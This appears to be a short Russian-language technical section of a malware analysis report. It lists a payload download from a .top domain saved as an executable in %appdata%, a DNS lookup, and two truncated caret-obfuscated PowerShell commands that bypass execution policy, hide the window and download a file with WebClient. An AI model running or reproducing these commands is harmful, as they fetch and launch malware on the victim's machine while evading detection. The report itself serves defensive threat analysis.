Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POw^ERSH^e^Ll.^e^xe ^-exe^cutIO^N^P^OL^Ic^y byPas^s -^No^PRoFIl^E^ -wIn^doWsTyle hIdd^En ^(^ne^w-O^b^jecT ^SYSTEM^.^n^E^t.^w^e^bCL^iEN^t).d^oWnloADf^iL^E('http://www.fapoergol....
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /C "POw^ERSH^e^Ll.^e^xe ^-exe^cutIO^N^P^OL^Ic^y byPas^s -^No^PRoFIl^E^ -wIn^doWsTyle hIdd^En ^(^ne^w-O^b^jecT ^SYSTEM^.^n^E^t.^w^e^bCL^iEN^t).d^oWnloADf^iL^E('http://www.fapoergol....' (со скрытым окном)